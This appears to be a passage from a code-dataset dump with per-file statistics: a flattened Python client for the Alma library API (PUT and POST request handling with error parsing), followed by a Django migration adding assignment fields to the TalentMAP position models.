ElementTree.ElementTree(ElementTree.fromstring(content)).getroot() error_message = root[1][0][1].text raise AlmaAPIException('GET - ' + str(response.status) + ' - ' + error_message) except ElementTree.ParseError as e: raise AlmaAPIException('GET - ' + str(e)) return content.decode('utf8') def put(self, *, request=False, body=False, query_params=None, content_type='application/xml'): if request is False or body is False: return False __query_params__ = '' if query_params is not None: for key, value in query_params.items(): __query_params__ += '&' + key + '=' + value url = self.api_url + request + self.api_key + __query_params__ headers = {'Content-type': content_type} try: (response, content) = http.Http().request(url, 'PUT', headers=headers, body=body) except TimeoutError as e: raise AlmaAPIException('PUT - ' + str(e)) if response.status != 200: if query_params['format'] == 'json': error_data = json.loads(content) try: error_message = error_data['errorList']['error'][0]['errorMessage'] except KeyError as e: error_message = 'Unknown Error' raise AlmaAPIException('PUT - ' + str(response.status) + ' - ' + error_message) else: root = ElementTree.ElementTree(ElementTree.fromstring(content)).getroot() error_message = root[1][0][1].text raise AlmaAPIException('PUT - ' + str(response.status) + ' - ' + error_message) return content.decode('utf8') def post(self, *, request=False, body=False, query_params=None, content_type='application/xml'): if request is False or body is False: return False __query_params__ = '' if query_params is not None: for key, value in query_params.items(): __query_params__ += '&' + key + '=' + value url = self.api_url + request + self.api_key + __query_params__ headers = {'Content-type': content_type} try: (response, content) = http.Http().request(url, 'POST', headers=headers, body=body) except TimeoutError as e: raise AlmaAPIException('POST - ' + str(e)) if response.status != 200: if query_params['format'] == 'json': error_data = json.loads(content) try: error_message = error_data['errorList']['error'][0]['errorMessage'] except KeyError as e: error_message = 'Unknown Error' raise AlmaAPIException('POST - ' + str(response.status) + ' - ' + error_message) else: root = ElementTree.ElementTree(ElementTree.fromstring(content)).getroot() error_message = root[1][0][1].text raise AlmaAPIException('POST - ' + str(response.status) + ' - ' + error_message) return content.decode('utf8')
40.061947
100
0.557765
469
4,527
5.179104
0.166311
0.095101
0.039522
0.054343
0.869494
0.857555
0.850144
0.809798
0.789625
0.746809
0
0.008508
0.324939
4,527
112
101
40.419643
0.786322
0.003534
0
0.795455
0
0
0.081243
0
0
0
0
0
0
1
0.045455
false
0
0.034091
0
0.170455
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
fb76a1e850f3866efdffdbab40e5b2481bba9f12
2,293
py
Python
talentmap_api/position/migrations/0006_auto_20180111_1740.py
burgwyn/State-TalentMAP-API
1f4f3659c5743ebfd558cd87af381f5460f284b3
[ "CC0-1.0" ]
5
2018-08-09T18:51:12.000Z
2021-11-08T10:28:17.000Z
talentmap_api/position/migrations/0006_auto_20180111_1740.py
burgwyn/State-TalentMAP-API
1f4f3659c5743ebfd558cd87af381f5460f284b3
[ "CC0-1.0" ]
232
2017-06-16T02:09:54.000Z
2018-05-10T16:15:48.000Z
talentmap_api/position/migrations/0006_auto_20180111_1740.py
burgwyn/State-TalentMAP-API
1f4f3659c5743ebfd558cd87af381f5460f284b3
[ "CC0-1.0" ]
4
2018-06-13T14:49:27.000Z
2021-06-30T22:29:15.000Z
# -*- coding: utf-8 -*- # Generated by Django 1.11.7 on 2018-01-11 17:40 from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('position', '0005_auto_20180110_1917'), ] operations = [ migrations.AddField( model_name='assignment', name='arrival_date', field=models.DateTimeField(help_text='The date the incumbent arrived at the position', null=True), ), migrations.AddField( model_name='assignment', name='bid_approval_date', field=models.DateTimeField(default='1975-01-01T00:00:00Z', help_text='The date the bid for this assignment was approved'), preserve_default=False, ), migrations.AddField( model_name='assignment', name='combined_differential', field=models.IntegerField(default=0, help_text='The combined differential (danger pay and differential) for this assignment'), ), migrations.AddField( model_name='assignment', name='domestic', field=models.BooleanField(default=False, help_text='Indicates if this position is domestic'), ), migrations.AddField( model_name='historicalassignment', name='arrival_date', field=models.DateTimeField(help_text='The date the incumbent arrived at the position', null=True), ), migrations.AddField( model_name='historicalassignment', name='bid_approval_date', field=models.DateTimeField(default='1975-01-01T00:00:00Z', help_text='The date the bid for this assignment was approved'), preserve_default=False, ), migrations.AddField( model_name='historicalassignment', name='combined_differential', field=models.IntegerField(default=0, help_text='The combined differential (danger pay and differential) for this assignment'), ), migrations.AddField( model_name='historicalassignment', name='domestic', field=models.BooleanField(default=False, help_text='Indicates if this position is domestic'), ), ]
39.534483
138
0.632795
237
2,293
5.978903
0.308017
0.101623
0.129852
0.152435
0.863797
0.863797
0.741002
0.741002
0.741002
0.741002
0
0.037455
0.266463
2,293
57
139
40.22807
0.804994
0.029655
0
0.84
1
0
0.325383
0.029253
0
0
0
0
0
1
0
false
0
0.04
0
0.1
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
8